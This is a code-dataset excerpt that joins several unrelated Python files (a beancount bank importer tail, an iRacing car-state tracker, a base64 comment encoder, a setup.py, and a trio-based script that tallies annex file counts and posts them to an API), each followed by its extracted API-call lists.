entries.append(entry)
if trx["transaction_id"] == transactions[-1]["transaction_id"]:
balDate = trxDate + timedelta(days=1)
metakv = {}
if self.existing_entries is not None:
for exEntry in self.existing_entries:
if (
isinstance(exEntry, data.Balance)
and exEntry.date == balDate
and exEntry.account == account
):
metakv["__duplicate__"] = True
meta = data.new_metadata("", 0, metakv)
# Only if the 'balance' permission is present
if "running_balance" in trx:
tx_balance = D(str(trx["running_balance"]["amount"]))
# avoid pylint invalid-unary-operand-type
signed_balance = -1 * tx_balance if invert_sign else tx_balance
entries.append(
data.Balance(
meta,
balDate,
account,
amount.Amount(
signed_balance, trx["running_balance"]["currency"]
),
None,
None,
)
)
return entries
|
[
"os.path.basename",
"logging.warning",
"beancount.core.amount.Amount",
"yaml.safe_load",
"datetime.timedelta",
"requests.get",
"requests.post",
"beancount.core.data.new_metadata"
] |
[((1413, 1618), 'requests.post', 'requests.post', (['f"""https://auth.{self.domain}/connect/token"""'], {'data': "{'grant_type': 'refresh_token', 'client_id': self.clientId, 'client_secret':\n self.clientSecret, 'refresh_token': self.refreshToken}"}), "(f'https://auth.{self.domain}/connect/token', data={\n 'grant_type': 'refresh_token', 'client_id': self.clientId,\n 'client_secret': self.clientSecret, 'refresh_token': self.refreshToken})\n", (1426, 1618), False, 'import requests\n'), ((2219, 2297), 'requests.get', 'requests.get', (['f"""https://api.{self.domain}/data/v1/{endpoint}"""'], {'headers': 'headers'}), "(f'https://api.{self.domain}/data/v1/{endpoint}', headers=headers)\n", (2231, 2297), False, 'import requests\n'), ((3561, 3593), 'beancount.core.data.new_metadata', 'data.new_metadata', (['""""""', '(0)', 'metakv'], {}), "('', 0, metakv)\n", (3578, 3593), False, 'from beancount.core import amount, data\n'), ((736, 753), 'yaml.safe_load', 'yaml.safe_load', (['f'], {}), '(f)\n', (750, 753), False, 'import yaml\n'), ((1221, 1245), 'os.path.basename', 'path.basename', (['file.name'], {}), '(file.name)\n', (1234, 1245), False, 'from os import path\n'), ((2647, 2759), 'requests.get', 'requests.get', (['f"""https://api.{self.domain}/data/v1/{endpoint}/{accountId}/transactions"""'], {'headers': 'headers'}), "(\n f'https://api.{self.domain}/data/v1/{endpoint}/{accountId}/transactions',\n headers=headers)\n", (2659, 2759), False, 'import requests\n'), ((4921, 4953), 'beancount.core.data.new_metadata', 'data.new_metadata', (['""""""', '(0)', 'metakv'], {}), "('', 0, metakv)\n", (4938, 4953), False, 'from beancount.core import amount, data\n'), ((4487, 4504), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (4496, 4504), False, 'from datetime import timedelta\n'), ((2453, 2471), 'logging.warning', 'logging.warning', (['e'], {}), '(e)\n', (2468, 2471), False, 'import logging\n'), ((4157, 4202), 'beancount.core.amount.Amount', 'amount.Amount', (['signed_amount', "trx['currency']"], {}), "(signed_amount, trx['currency'])\n", (4170, 4202), False, 'from beancount.core import amount, data\n'), ((5449, 5514), 'beancount.core.amount.Amount', 'amount.Amount', (['signed_balance', "trx['running_balance']['currency']"], {}), "(signed_balance, trx['running_balance']['currency'])\n", (5462, 5514), False, 'from beancount.core import amount, data\n')]
|
import logging
import sys
from enum import Enum
from racelogger.util.utils import gate
CAR_SLOW_SPEED = 25
""" a car is considered to be slow if its speed is below this value"""
CarsManifest = ['state','carIdx','carNum','userName','teamName','car','carClass','pos','pic','lap','lc','gap','interval','trackPos','speed','dist','pitstops', 'stintLap','last','best']
"""
this is the base manifest for car data. Sector times may be added at the end.
On the other hand, items like "teamName, carClass" (and maybe others)
may be removed if they are not used in the recording session.
"""
class SectionTiming:
"""
this class is used to measure a sector time or a complete lap time.
The key attr identifies a sector or lap number
"""
def __init__(self) -> None:
self.start_time = -1
self.stop_time = -1
self.duration = -1
self.best = sys.maxsize
def mark_start(self,sessionTime):
self.start_time = sessionTime
def mark_stop(self,sessionTime):
self.stop_time = sessionTime
self.duration = self.stop_time - self.start_time
return self.duration
# self.best = min(self.best,self.duration)
class CarLaptiming:
def __init__(self, num_sectors=0) -> None:
self.lap = SectionTiming()
self.sectors = [SectionTiming() for x in range(num_sectors)]
def reset(self):
pass
class CarState(Enum):
INIT = 0
RUN = 1
PIT = 2
FINISHED = 3
OUT = 4
SLOW = 5
class PitBoundaryData:
"""
@param keep_hist use at most this many entries for computation
@param min_hist build up at least this many entries before deciding about which entries to keep.
"""
def __init__(self, keep_hist=21, min_hist=3) -> None:
self.min = 0
self.max = 0
self.middle = 0
self.hist = []
self.keep_hist = keep_hist
self.min_hist = min_hist
def process(self, trackPos):
"""
        process the given trackPos: while the history is still filling up, append it and recompute the summary values; once full, append it and periodically sort the history and drop its extreme values
"""
if len(self.hist) < self.keep_hist:
self.hist.append(trackPos)
self.compute_values()
return
self.hist.append(trackPos)
if len(self.hist) % 2 == 1:
self.hist.sort()
self.hist = self.hist[1:-1]
def compute_values(self):
self.min = self.hist[0]
self.max = self.hist[-1]
self.middle = self.hist[len(self.hist)>>1]
def __repr__(self) -> str:
tmp = ", ".join([f"{e}" for e in self.hist] )
return f'PitBoundaryData min: {self.min} max: {self.max} avg: {self.middle} hist: {tmp}'
class PitBoundaries():
def __init__(self) -> None:
self.pit_entry_boundary = PitBoundaryData()
self.pit_exit_boundary = PitBoundaryData()
def process_entry(self, trackPos):
self.pit_entry_boundary.process(trackPos)
def process_exit(self, trackPos):
self.pit_exit_boundary.process(trackPos)
def __repr__(self) -> str:
return f'PitEntry: {self.pit_entry_boundary}\nPitExit: {self.pit_exit_boundary}\n'
class CarData:
"""
this class holds data about a car during a race.
No data history is stored here.
"""
def __init__(self,carIdx=None, manifest=CarsManifest,num_sectors=0, driver_proc=None, pit_boundaries=None) -> None:
self.logger = logging.getLogger(self.__class__.__name__)
for item in manifest:
self.__setattr__(item, "")
self.current_best = sys.maxsize
self.carIdx = carIdx
self.manifest = manifest
self.slow_marker = False
self.current_sector = -1
self.stintLap = 0
self.pitstops = 0
self.driver_proc = driver_proc
self.lap_timings = CarLaptiming(num_sectors=num_sectors)
self.pit_boundaries = pit_boundaries
self.marker_info = (-1,"") # lapNo/marker
self.processState = CarState.INIT
self.stateSwitch = {
CarState.INIT: self.state_init,
CarState.RUN: self.state_racing,
CarState.SLOW: self.state_racing_slow,
CarState.PIT: self.state_pitting,
CarState.FINISHED: self.state_finished,
CarState.OUT: self.state_out_of_race,
}
self.postProcessStateSwitch = {
CarState.INIT: self.state_post_process_noop,
CarState.RUN: self.state_post_process_run,
CarState.SLOW: self.state_post_process_slow,
CarState.PIT: self.state_post_process_noop,
CarState.FINISHED: self.state_post_process_noop,
CarState.OUT: self.state_post_process_noop,
}
def state_init(self, ir):
self.copy_standards(ir)
self.trackPos = gate(ir['CarIdxLapDistPct'][self.carIdx])
self.pos = ir['CarIdxPosition'][self.carIdx]
self.pic = ir['CarIdxClassPosition'][self.carIdx]
self.lap = ir['CarIdxLap'][self.carIdx]
self.lc = ir['CarIdxLapCompleted'][self.carIdx]
if ir['CarIdxLapDistPct'][self.carIdx] == -1:
self.state= "OUT"
self.processState = CarState.OUT
return
if ir['CarIdxOnPitRoad'][self.carIdx]:
self.copy_when_racing(ir)
self.state = "PIT"
self.processState = CarState.PIT
self.stintLap = 0
else:
self.copy_when_racing(ir)
self.state = "RUN"
self.processState = CarState.RUN
def state_racing(self, ir):
self.copy_standards(ir)
if ir['CarIdxLapDistPct'][self.carIdx] == -1:
self.state= "OUT"
self.processState = CarState.OUT
return
if ir['CarIdxOnPitRoad'][self.carIdx] == False and ir['CarIdxLapCompleted'][self.carIdx]>self.lc:
self.stintLap += 1
self.copy_when_racing(ir)
if ir['CarIdxOnPitRoad'][self.carIdx]:
self.state = "PIT"
self.pitstops += 1
self.processState = CarState.PIT
self.pit_boundaries.process_entry(ir['CarIdxLapDistPct'][self.carIdx])
def state_racing_slow(self, ir):
self.copy_standards(ir)
if ir['CarIdxLapDistPct'][self.carIdx] == -1:
self.state= "OUT"
self.processState = CarState.OUT
return
self.copy_when_racing(ir)
if ir['CarIdxOnPitRoad'][self.carIdx]:
self.state = "PIT"
self.pitstops += 1
self.processState = CarState.PIT
self.pit_boundaries.process_entry(ir['CarIdxLapDistPct'][self.carIdx])
def state_pitting(self, ir):
self.copy_standards(ir)
if ir['CarIdxLapDistPct'][self.carIdx] == -1:
self.state= "OUT"
self.processState = CarState.OUT
return
self.copy_when_racing(ir)
if ir['CarIdxOnPitRoad'][self.carIdx] == 0:
self.state = "RUN"
self.stintLap = 1
self.processState = CarState.RUN
self.pit_boundaries.process_exit(ir['CarIdxLapDistPct'][self.carIdx])
def state_finished(self, ir):
# self.logger.debug(f"carIdx {self.carIdx} finished the race.")
self.copy_standards(ir)
def state_out_of_race(self, ir):
self.copy_standards(ir)
# this may happen after resets or tow to pit road. if not on the pit road it may just be a short connection issue.
if ir['CarIdxOnPitRoad'][self.carIdx]:
self.state = "PIT"
self.processState = CarState.PIT
else:
if ir['CarIdxLapDistPct'][self.carIdx] > -1:
self.state = "RUN"
self.processState = CarState.RUN
def process(self, ir):
# handle processing depending on current state
self.stateSwitch[self.processState](ir)
#
# handle post processing after times, speed, delta are computed
#
def state_post_process_noop(self, msg_proc=None):
pass # do nothing by design
def state_post_process_run(self, msg_proc):
if self.speed > 0 and self.speed < CAR_SLOW_SPEED :
self.state = 'SLOW'
self.processState = CarState.SLOW
msg_proc.add_car_slow(self.carIdx,self.speed)
def state_post_process_slow(self, msg_proc):
if self.speed > CAR_SLOW_SPEED:
if self.processState == CarState.SLOW:
self.processState = CarState.RUN
self.state = 'RUN'
else:
self.logger.warn(f"should not happen. carNum {self.driver_proc.car_number(self.carIdx)} procState: {self.processState} state: {self.state}")
def post_process(self, msg_proc):
# handles post processing of special cases.
self.postProcessStateSwitch[self.processState](msg_proc)
def copy_standards(self,ir):
self.carNum = self.driver_proc.car_number(self.carIdx)
self.userName = self.driver_proc.user_name(self.carIdx)
self.teamName = self.driver_proc.team_name(self.carIdx)
self.carClass = self.driver_proc.car_class(self.carIdx)
self.car = self.driver_proc.car(self.carIdx)
def copy_when_racing(self, ir):
self.trackPos = gate(ir['CarIdxLapDistPct'][self.carIdx])
self.pos = ir['CarIdxPosition'][self.carIdx]
self.pic = ir['CarIdxClassPosition'][self.carIdx]
self.lap = ir['CarIdxLap'][self.carIdx]
self.lc = ir['CarIdxLapCompleted'][self.carIdx]
self.dist = 0
self.interval = 0
def manifest_output(self):
return [self.__getattribute__(x) for x in self.manifest]
|
[
"logging.getLogger",
"racelogger.util.utils.gate"
] |
[((3347, 3389), 'logging.getLogger', 'logging.getLogger', (['self.__class__.__name__'], {}), '(self.__class__.__name__)\n', (3364, 3389), False, 'import logging\n'), ((4729, 4770), 'racelogger.util.utils.gate', 'gate', (["ir['CarIdxLapDistPct'][self.carIdx]"], {}), "(ir['CarIdxLapDistPct'][self.carIdx])\n", (4733, 4770), False, 'from racelogger.util.utils import gate\n'), ((9178, 9219), 'racelogger.util.utils.gate', 'gate', (["ir['CarIdxLapDistPct'][self.carIdx]"], {}), "(ir['CarIdxLapDistPct'][self.carIdx])\n", (9182, 9219), False, 'from racelogger.util.utils import gate\n')]
|
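# --- Illustrative sketch only (assumes the PitBoundaryData class defined above is in
# scope); the track-position samples are made-up values around a pit entry.
boundary = PitBoundaryData()
for pos in [0.812, 0.820, 0.815, 0.818]:
    boundary.process(pos)
print(boundary)  # repr lists the tracked min / max / middle and the raw history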
from base64 import b64encode as _e, b64decode as _d
def encode(text: str, timestamp: float) -> str:
"""Encode comment into base64 string.
:param text: The text of the comment.
:param timestamp: The timestamp of the comment.
:return: The base64-encoded comment.
"""
return '%s:%s' % (_encode(text), _encode(timestamp))
def decode(comment: str) -> tuple:
"""Decode base64 string into comment.
:param comment: The base64-encoded comment.
:return: The decoded comment (text, timestamp).
"""
text, timestamp = comment.split(':', 1)
return _decode(text), _decode(timestamp)
def encode_many(comments: list) -> str:
"""Encode many comments into base64 string.
:param comments: The source list of comments.
:return: The base64-encoded list of comments.
"""
return ';'.join(encode(text, timestamp) for text, timestamp in comments)
def decode_many(comments: str) -> list:
"""Decode base64 string into many comments.
:param comments: The base64-encoded list of comments.
    :return: The decoded list of comments [(text, timestamp)].
"""
return [decode(comment) for comment in comments.split(';')]
def _encode(src: str or float) -> str:
return _e(str(src).encode()).decode()
def _decode(src: str) -> str or float:
decoded = _d(src).decode()
try:
return float(decoded)
except ValueError:
return decoded
|
[
"base64.b64decode"
] |
[((1251, 1258), 'base64.b64decode', '_d', (['src'], {}), '(src)\n', (1253, 1258), True, 'from base64 import b64encode as _e, b64decode as _d\n')]
|
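# --- Round-trip sketch for the comment codec above (the sample values are assumptions).
# Each field is base64-encoded separately, so the ':' and ';' separators can never
# appear inside the encoded payload itself.
if __name__ == '__main__':
    packed = encode_many([("first comment", 1.5), ("second comment", 42.0)])
    print(packed)               # e.g. 'Zmlyc3QgY29tbWVudA==:MS41;...'
    print(decode_many(packed))  # [('first comment', 1.5), ('second comment', 42.0)]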
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import pypandoc
import os
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
with open('requirements.txt') as requirements:
install_requires = requirements.read().splitlines()
try:
long_description = pypandoc.convert('README.md', 'rst')
long_description = long_description.replace("\r","")
except OSError:
print("Pandoc not found. Long_description conversion failure.")
import io
with io.open('README.md', encoding="utf-8") as f:
long_description = f.read()
setup(
name='MovieSerieTorrent',
version='1.0.16',
packages=find_packages(),
install_requires=install_requires,
author="<NAME>",
author_email="<EMAIL>",
description="Parser and Renamer for torrents files (Movies and series)",
long_description= long_description,
include_package_data=True,
url='https://github.com/JonathanPetit/Parser-Renamer',
license= 'MIT',
keywords = 'parser renamer formatting python torrents torrent files file movie serie movies series',
classifiers=[
"Programming Language :: Python",
"Natural Language :: French",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
],
)
|
[
"os.path.abspath",
"pypandoc.convert",
"setuptools.find_packages",
"io.open"
] |
[((328, 364), 'pypandoc.convert', 'pypandoc.convert', (['"""README.md"""', '"""rst"""'], {}), "('README.md', 'rst')\n", (344, 364), False, 'import pypandoc\n'), ((683, 698), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (696, 698), False, 'from setuptools import setup, find_packages\n'), ((156, 181), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (171, 181), False, 'import os\n'), ((529, 567), 'io.open', 'io.open', (['"""README.md"""'], {'encoding': '"""utf-8"""'}), "('README.md', encoding='utf-8')\n", (536, 567), False, 'import io\n')]
|
# -*- coding: utf-8 -*-
import argparse, datetime, glob, json, logging, os, pprint, random, time
from functools import partial
from operator import itemgetter
from typing import Iterator, List, Optional
import asks, trio
logging.basicConfig(
# filename=settings.LOG_PATH,
level=logging.DEBUG,
format='[%(asctime)s] %(levelname)s [%(module)s-%(funcName)s()::%(lineno)d] %(message)s',
datefmt='%d/%b/%Y %H:%M:%S' )
log = logging.getLogger(__name__)
class Initializer:
""" Creates initial tracker. """
def __init__( self ):
self.SOURCE_DIR_PATH = os.environ['ANXEOD__SOURCE_DIR_PATH']
self.DESTINATION_PATH = os.environ['ANXEOD__TRACKER_A_PATH']
self.filepath_tracker = []
self.start = datetime.datetime.now()
self.files: list = glob.glob( f'{self.SOURCE_DIR_PATH}/*.dat' )
def initialize_tracker( self ):
""" Manages build.
Called by main() """
log.debug( f'len(files), `{len(self.files)}`' )
for path in self.files:
self.build_initial_tracker( path )
sorted_filepath_tracker = self.build_sorted_tracker()
time_taken = str( datetime.datetime.now() - self.start )
log.debug( f'time_taken, `{time_taken}`' )
with open( self.DESTINATION_PATH, 'w' ) as f:
jsn: str = json.dumps( sorted_filepath_tracker, sort_keys=True, indent=2 )
f.write( jsn )
return
def build_initial_tracker( self, path: str ) -> None:
""" Creates initial dict of file-info & appends it to self.filepath_tracker list.
Called by initialize_tracker() """
file_timestamp: float = os.path.getmtime( path )
timestamp: datetime.datetime = datetime.datetime.fromtimestamp( file_timestamp )
info: dict = { 'path': path, 'timestamp': timestamp, 'updated': None }
self.filepath_tracker.append( info )
return
def build_sorted_tracker( self ) -> list:
""" Sorts initial tracker & updates timestamp-type.
Called by initialize_tracker() """
sorted_filepath_tracker: list = sorted( self.filepath_tracker, key=itemgetter('timestamp') )
for entry in sorted_filepath_tracker:
entry['timestamp'] = str( entry['timestamp'] ) # needs for json dump
log.debug( f'len(sorted_filepath_tracker), `{len(sorted_filepath_tracker)}`' )
return sorted_filepath_tracker
## end class Initializer
class Counter:
""" Creates count-tracker. """
def __init__( self ):
self.INITIAL_TRACKER_PATH = os.environ['ANXEOD__TRACKER_A_PATH']
self.COUNT_TRACKER_PATH = os.environ['ANXEOD__TRACKER_B_PATH']
self.date_dct = {}
self.start = datetime.datetime.now()
# def build_count_tracker( self ) -> None:
# """
# Flow...
# load file
# create new count_tracker file
# create a list of date-dicts by going through all entries
# for each entry
    #             determine the proper date
# determine the _kind_ of count
# determine the count
# update the count-tracker file
# """
# file_entries: List[dict] = self.load_file_list()
# self.initialize_count_tracker()
# self.make_date_dict( file_entries )
# for entry in file_entries:
# entry_date: datetime.date = datetime.datetime.strptime( entry['timestamp'], '%Y-%m-%d %H:%M:%S' ).date()
# count_type: str = self.parse_type( entry['path'] )
# count: int = self.parse_count( entry['path'] )
# self.date_dct[str(entry_date)][count_type] = count
# self.update_count_tracker()
# return
def build_count_tracker( self ) -> None:
"""
Flow...
load file
create new count_tracker file
create a list of date-dicts by going through all entries
for each entry
                determine the proper date
determine the _kind_ of count
determine the count
update the count-tracker file
"""
file_entries: List[dict] = self.load_file_list()
self.initialize_count_tracker()
self.make_date_dict( file_entries )
for entry in file_entries:
entry_date: datetime.date = datetime.datetime.strptime( entry['timestamp'], '%Y-%m-%d %H:%M:%S' ).date()
count_type: str = self.parse_type( entry['path'] )
count: int = self.parse_count( entry['path'] )
self.update_date_dct( entry_date, count_type, count ) # handles multiple files in a given day
# self.date_dct[str(entry_date)][count_type] = count
self.update_count_tracker()
return
def load_file_list( self ) -> List[dict]:
""" Loads tracker-a.
Called by build_count_tracker() """
with open( self.INITIAL_TRACKER_PATH, 'r' ) as f:
entries_jsn: str = f.read()
entries: list = json.loads( entries_jsn )
return entries
def initialize_count_tracker( self ) -> None:
""" Saves empty list file.
Called by build_count_tracker() """
count_tracker: list = []
empty_count_tracker_jsn: str = json.dumps( count_tracker )
with open( self.COUNT_TRACKER_PATH, 'w' ) as f:
f.write( empty_count_tracker_jsn )
return
def make_date_dict( self, file_entries: List[dict] ) -> None:
""" Populates self.date_dct.
Called by build_count_tracker() """
for entry in file_entries:
timestamp: str = entry['timestamp']
date_obj: datetime.date = datetime.datetime.strptime( timestamp, '%Y-%m-%d %H:%M:%S' ).date()
date_str: str = str( date_obj )
self.date_dct[date_str] = {}
log.debug( f'self.date_dct, ```{pprint.pformat(self.date_dct)[0:100]}```' )
log.debug( f'num-dates, `{len(self.date_dct.keys())}`' )
return
def parse_type( self, path: str ) -> str:
""" Parses count type.
Called by build_count_tracker() """
count_type: str = ''
if 'QHACS' in path:
count_type = 'hay_accessions'
elif 'QSACS' in path:
count_type = 'non-hay_accessions'
elif 'QHREF' in path:
count_type = 'hay_refiles'
elif 'QSREF' in path:
count_type = 'non-hay_refiles'
else:
raise Exception( 'unhandled count-type' )
return count_type
def parse_count( self, path: str ) -> int:
""" Loads file and parses count.
Called by build_count_tracker() """
with open( path, 'r' ) as f:
data = f.readlines()
count = len( data )
return count
def update_date_dct( self, entry_date, count_type, count ) -> None:
if count_type in self.date_dct[str(entry_date)].keys():
log.info( f'existing count of `{count}` already found for date, ```{entry_date}```; count_type, `{count_type}`' )
self.date_dct[str(entry_date)][count_type] += count
else:
self.date_dct[str(entry_date)][count_type] = count
return
def update_count_tracker( self ) -> None:
""" Writes file.
Called by build_count_tracker() """
jsn: str = json.dumps( self.date_dct, sort_keys=True, indent=2 )
with open( self.COUNT_TRACKER_PATH, 'w' ) as f:
f.write( jsn )
log.debug( f'time-taken, `{str( datetime.datetime.now() - self.start )}`' )
return
## end class Counter
class Updater:
""" Updates db. """
def __init__( self ):
self.COUNT_TRACKER_PATH = os.environ['ANXEOD__TRACKER_B_PATH']
self.UPDATED_COUNT_TRACKER_PATH = os.environ['ANXEOD__TRACKER_C_PATH']
self.API_UPDATER_URL = os.environ['ANXEOD__ANNEX_COUNTS_API_UPDATER_URL']
self.API_AUTHKEY = os.environ['ANXEOD__ANNEX_COUNTS_API_AUTHKEY']
self.updated_count_tracker_dct = {}
self.nursery = None
self.throttle: float = 1.0
self.mutex = None
self.continue_worker_flag = True
self.start = datetime.datetime.now()
self.sanity_check_limit: int = 3
def update_db( self ) -> None:
""" Calls concurrency-manager function.
Called by main()
Credit: <https://stackoverflow.com/questions/51250706/combining-semaphore-and-time-limiting-in-python-trio-with-asks-http-request>
"""
self.setup_final_tracker()
trio.run( partial(self.manage_concurrent_updates, n_workers=3) )
log.debug( f'total time taken, `{str( datetime.datetime.now() - self.start )}` seconds' )
return
def setup_final_tracker( self ) -> None:
""" Initializes final tracker if it doesn't exist.
Called by update_db() """
try:
with open( self.UPDATED_COUNT_TRACKER_PATH, 'r' ) as f:
self.updated_count_tracker_dct = json.loads( f.read() )
log.debug( 'existing updated_count_tracker found and loaded' )
except Exception as e:
log.debug( f'updated_count_tracker _not_ found, exception was ```{e}```, so creating it' )
self.create_final_tracker()
return
def create_final_tracker( self ) -> None:
""" Writes final-tracker-file.
Called by setup_final_tracker() """
with open( self.COUNT_TRACKER_PATH, 'r' ) as f:
count_tracker_dct = json.loads( f.read() )
for date_key, count_info in count_tracker_dct.items():
count_info['updated'] = None
actual_count_info_keys = list( count_info.keys() )
for required_key in ['hay_accessions', 'hay_refiles', 'non-hay_accessions', 'non-hay_refiles']:
if required_key not in actual_count_info_keys:
count_info[required_key] = 0
self.updated_count_tracker_dct = count_tracker_dct
with open( self.UPDATED_COUNT_TRACKER_PATH, 'w' ) as f:
f.write( json.dumps(self.updated_count_tracker_dct, sort_keys=True, indent=2) )
return
async def manage_concurrent_updates(self, n_workers: int ):
""" Manages asynchronous processing of db updates.
Called by update_db() """
async with trio.open_nursery() as nursery:
self.nursery = nursery
for _ in range(n_workers):
self.nursery.start_soon( self.run_worker_job )
async def run_worker_job( self ) -> None:
""" Manages worker job.
Called by manage_concurrent_updates() """
log.debug( 'function starting' )
temp_counter = 0
while self.continue_worker_flag is True:
temp_counter += 1
await self.get_mutex().acquire()
log.debug( 'mutex acquired to start job' )
self.nursery.start_soon( self.tick )
entry: Optional[dict] = self.grab_next_entry()
if entry is None:
log.info( 'no more entries -- cancel' )
self.continue_worker_flag = False
elif temp_counter >= self.sanity_check_limit:
log.info( f'temp_counter, `{temp_counter}`, so will stop' )
self.continue_worker_flag = False
else:
# await asks.get( 'https://httpbin.org/delay/4' )
await self.post_update( entry )
log.debug( 'url processed' )
self.save_updated_tracker()
return
def get_mutex( self ):
if self.mutex == None:
self.mutex = trio.Semaphore(1)
else:
pass
log.debug( 'returning mutex' )
return self.mutex
async def tick( self ) -> None:
await trio.sleep( self.throttle )
self.mutex.release()
def grab_next_entry( self ) -> Optional[dict]:
""" Finds and returns next entry to process.
Called by run_worker_job() """
key_entry: Optional[dict] = None
for key, count_info in self.updated_count_tracker_dct.items():
# log.debug( f'current key, `{key}`; current count_info, ```{count_info}```' )
if count_info['updated'] is None:
log.debug( 'found next entry to process' )
key_entry = { key: count_info }
count_info['updated'] = 'in_process'
break
log.debug( f'returning key_entry, ```{key_entry}```' )
# log.debug( f'self.updated_count_tracker_dct, ```{pprint.pformat(self.updated_count_tracker_dct)[0:1000]}```' )
return key_entry
async def post_update( self, entry: dict ):
""" Runs the post.
Called by run_worker_job() """
params: dict = self.prep_params( entry )
params['auth_key'] = self.API_AUTHKEY
temp_process_id = random.randint( 1111, 9999 )
log.debug( f'`{temp_process_id}` -- about to hit url' )
resp = await asks.post( self.API_UPDATER_URL, data=params, timeout=10 )
# resp = await asks.get( 'https://httpbin.org/delay/4' )
log.debug( f'`{temp_process_id}` -- url response received, ```{resp.content}```' )
date_key, other = list(entry.items())[0]
if resp.status_code == 200:
self.updated_count_tracker_dct[date_key]['updated'] = str( datetime.datetime.now() )
else:
self.updated_count_tracker_dct[date_key]['updated'] = 'PROBLEM'
log.debug( f'status_code, `{resp.status_code}`; type(status_code), `{type(resp.status_code)}`; content, ```{resp.content}```' )
return
def prep_params( self, entry: dict ):
""" Preps post params.
Called by post_update() """
( date_key, info ) = list( entry.items() )[0] # date_key: str, info: dict
log.debug( f'info, ```{info}```' )
param_dct = {
'date': date_key,
'hay_accessions': info['hay_accessions'],
'hay_refiles': info['hay_refiles'],
'non_hay_accessions': info['non-hay_accessions'],
'non_hay_refiles': info['non-hay_refiles'],
}
log.debug( f'param_dct, ```{param_dct}```' )
return param_dct
def save_updated_tracker( self ) -> None:
""" Writes dct attribute.
Called by run_worker_job() """
with open( self.UPDATED_COUNT_TRACKER_PATH, 'w' ) as f:
f.write( json.dumps(self.updated_count_tracker_dct, sort_keys=True, indent=2) )
log.debug( 'updated tracker saved' )
return
## end class Updater
# --------------------
# caller
# --------------------
def parse_args():
""" Parses arguments when module called via __main__ """
parser = argparse.ArgumentParser( description='Required: function-name.' )
parser.add_argument( '--function', '-f', help='function name required', required=True )
args_dict = vars( parser.parse_args() )
return args_dict
def call_function( function_name: str ) -> None:
""" Safely calls function named via input string to __main__
Credit: <https://stackoverflow.com/a/51456172> """
log.debug( f'function_name, ```{function_name}```' )
initializer = Initializer()
counter = Counter()
updater = Updater()
safe_dispatcher = {
'initialize_tracker': initializer.initialize_tracker,
'build_counts': counter.build_count_tracker,
'update_db': updater.update_db
}
try:
safe_dispatcher[function_name]()
except:
raise Exception( 'invalid function' )
return
if __name__ == '__main__':
args: dict = parse_args()
log.debug( f'args, ```{args}```' )
submitted_function: str = args['function']
call_function( submitted_function )
# --------------------
# trio experimentation from: <https://stackoverflow.com/questions/51250706/combining-semaphore-and-time-limiting-in-python-trio-with-asks-http-request>
# --------------------
# (neither of the two methods below work with requests)
# # --------------------
# # works...
# # --------------------
# import pprint
# from functools import partial
# from typing import List, Iterator
# import asks
# import trio
# links: List[str] = [
# 'https://httpbin.org/delay/7',
# 'https://httpbin.org/delay/6',
# 'https://httpbin.org/delay/3'
# ] * 2
# responses = []
# async def fetch_urls(urls: Iterator, responses: list, n_workers: int, throttle: int ):
# # Using binary `trio.Semaphore` to be able
# # to release it from a separate task.
# mutex = trio.Semaphore(1)
# async def tick():
# await trio.sleep(throttle)
# mutex.release()
# async def worker():
# for url in urls:
# await mutex.acquire()
# print( f'[{round(trio.current_time(), 2)}] Start loading link: {url}' )
# nursery.start_soon(tick)
# response = await asks.get(url)
# responses.append(response)
# async with trio.open_nursery() as nursery:
# for _ in range(n_workers):
# nursery.start_soon(worker)
# # trio.run( fetch_urls, iter(links), responses, 5, 1 ) # works
# # trio.run( fetch_urls, urls=iter(links), responses=responses, n_workers=5, throttle=1 ) # doesn't work
# trio.run( partial(fetch_urls, urls=iter(links), responses=responses, n_workers=5, throttle=1) ) # works
# print( f'responses, ```{pprint.pformat(responses)}```' )
# --------------------
# works...
# --------------------
# from typing import List, Iterator
# import asks
# import trio
# asks.init('trio')
# links: List[str] = [
# 'https://httpbin.org/delay/4',
# 'https://httpbin.org/delay/3',
# 'https://httpbin.org/delay/1'
# ] * 3
# async def fetch_urls(urls: List[str], number_workers: int, throttle_rate: float):
# async def token_issuer(token_sender: trio.abc.SendChannel, number_tokens: int):
# async with token_sender:
# for _ in range(number_tokens):
# await token_sender.send(None)
# await trio.sleep(1 / throttle_rate)
# async def worker(url_iterator: Iterator, token_receiver: trio.abc.ReceiveChannel):
# async with token_receiver:
# for url in url_iterator:
# await token_receiver.receive()
# print(f'[{round(trio.current_time(), 2)}] Start loading link: {url}')
# response = await asks.get(url)
# # print(f'[{round(trio.current_time(), 2)}] Loaded link: {url}')
# responses.append(response)
# responses = []
# url_iterator = iter(urls)
# token_send_channel, token_receive_channel = trio.open_memory_channel(0)
# async with trio.open_nursery() as nursery:
# async with token_receive_channel:
# nursery.start_soon(token_issuer, token_send_channel.clone(), len(urls))
# for _ in range(number_workers):
# nursery.start_soon(worker, url_iterator, token_receive_channel.clone())
# return responses
# responses = trio.run(fetch_urls, links, 5, 1.)
|
[
"functools.partial",
"trio.open_nursery",
"trio.Semaphore",
"argparse.ArgumentParser",
"logging.basicConfig",
"random.randint",
"json.loads",
"pprint.pformat",
"datetime.datetime.fromtimestamp",
"json.dumps",
"datetime.datetime.strptime",
"asks.post",
"os.path.getmtime",
"glob.glob",
"operator.itemgetter",
"datetime.datetime.now",
"trio.sleep",
"logging.getLogger"
] |
